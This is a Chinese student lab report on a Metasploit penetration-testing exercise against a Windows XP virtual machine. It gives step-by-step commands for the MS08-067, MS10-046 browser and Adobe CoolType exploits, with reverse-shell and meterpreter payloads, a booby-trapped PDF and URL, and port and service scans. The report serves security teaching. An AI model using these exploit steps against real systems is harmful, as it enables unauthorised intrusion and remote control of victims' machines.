【实践要求】
1.一个主动攻击,如ms08_067
2.一个针对浏览器的攻击,如ms11_050
3.一个针对客户端的攻击,如Adobe
4.成功应用任何一个辅助模块
【基础知识问答】
用自己的话解释什么是exploit,payload,encode
- exploit渗透攻击模块,利用发现的安全漏洞对远程系统进行攻击
- Payload攻击载荷模块,渗透攻击成功后在目标系统中运行的代码,exploit把payload运过去,payload实现攻击
- Encode编码器模块,为了确保Exploit、payload “安全”,不会混入“坏字符”
【实践过程】
准备:
安装英文版xp系统
ip
1.Windows服务渗透攻击——MS08-067安全漏洞
调用该模块,并且查看可以使用的payload
use exploit/windows/smb/ms08_067_netapi
show payloads
查看需要设置的信息
set payload generic/shell_reverse_tcp
设置payload,tcp反向回连
set LHOST 192.168.29.129
攻击机kali ip
set LPORT 4330
攻击端口
set RHOST 192.168.29.130
靶机winxp ip
set target 0
自动选择目标系统类型,匹配度较高
show options看一下配置是否都正确
最后exploit开启监听
纳尼。。。不成功什么鬼
找原因原来是xp防火墙没关 尴尬
好了很完美
2. 对浏览器攻击:ms10_046漏洞攻击
基本步骤还是和上面一样
用use exploit/windows/browser/ms10_046_shortcut_icon_dllloader
使用该模块,再使用show payloads
查看可以供我们使用的payload:
然后查看需要设置的参数,SRVHOST填的是本地监听主机的IP地址,LHOST也是监听的IP地址,所以这里SRVHOST和LHOST都应该填攻击机的IP地址:
设置好参数后,进行查看:
使用exploit指令执行漏洞,可以看到生成了一个url:
在靶机的IE浏览器上使用该url进行访问
在MSF终端看见漏洞执行成功:
ok
3.针对Adobe的攻击
search adobe 搜索可以用来攻击adobe软件的模块,选择一个使用。
我选择的是adobe_cooltype_sing
use exploit/windows/browser/adobe_cooltype_sing
set payload windows/meterpreter/reverse_tcp
set LHOST 192.168.29.129
set LPORT 4330
set FILENAME 20154330.pdf
同理,设置payload 、LHOST 、LPORT 、文件名称,输入exploit 就能生成,由于我用的是 browser 下的攻击模块,所以它会生成一个 url 链接,点开会自动下载一个空白的 pdf 文件。
拷贝到xp系统打开
出现Successfully
输入sessions
查看当前存在的会话,可以看到存在两个回话
我们选择第一个
sessions -i 1
查看一下ip
ok
4.辅助模块应用
找了一个tcp端口扫描的辅助模块感觉好简单所以就多找了几个
4.1tcp端口扫描
使用指令 use auxiliary/scanner/portscan/tcp 扫描目标主机上TCP使用的端口号,设置下靶机IP,run.
4.2smb_version
使用指令 show auxiliary 可以查看当前版本可用的辅助功能模块
使用 scanner/smb/smb_version 可以查看靶机的smb版本,输入指令 show options查看需要设定的配置。
设定完后,run 运行。
4.3检测常用的udp服务
使用指令 use auxiliary/scanner/discovery/udp_sweep 检测目标主机上常用的udp服务,设置下靶机IP就行。
我们可以看一下xp系统上的mac地址
完美!!!!!
【实践体会】
本次实践主要是善意的攻击别人电脑(渗透测试)。本次实验分为四个小实验,相对而言都是比较简单的,但是我觉得都特别有意思,以后有时间可以经常试试windows7的或者windows10也是可以的,总之xp系统的攻击不能说是特别娴熟,但是相关漏洞只要能够看的懂,都可以一试,至于成不成功那就不好说了呀。。。。